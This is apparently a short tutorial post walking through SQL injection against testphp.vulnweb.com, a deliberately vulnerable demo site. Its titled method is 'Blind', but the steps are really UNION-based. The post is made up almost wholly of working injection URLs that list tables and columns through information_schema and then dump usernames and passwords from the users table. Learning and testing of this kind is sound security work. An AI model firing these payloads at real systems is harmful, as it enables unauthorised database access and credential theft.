Blind SQL Injection
Check error: http://testphp.vulnweb.com/artists.php?artist=1′
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
—
1. Select Table Name and Column Name
|
1 |
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' -- |
Result: artists | artist_id
2. Select other Table (Skipping Artists table)
|
1 |
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 2,3, concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' and table_name not in ('artists') -- |
Result: carts | cart_id
Skipping table ‘artists’,’carts’, ‘categ’, ‘featured’, ‘guestbook’, ‘pictures’, ‘products’
|
1 |
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' and table_name not in ('artists','carts', 'categ', 'featured', 'guestbook', 'pictures', 'products') -- |
Result: users | uname
3. Display other column in table “users”
|
1 |
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' and table_name not in ('artists','carts', 'categ', 'featured', 'guestbook', 'pictures', 'products') and column_name not in('uname') -- |
Result: users | pass
There are 2 columns in the table “users” as below:
“users | uname”
“users | pass”
4. Show uname & pass value from table “users”
|
1 |
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(uname,' | ',pass) FROM users -- |
Final result: test | test
User: test | Password: test
Recent Comments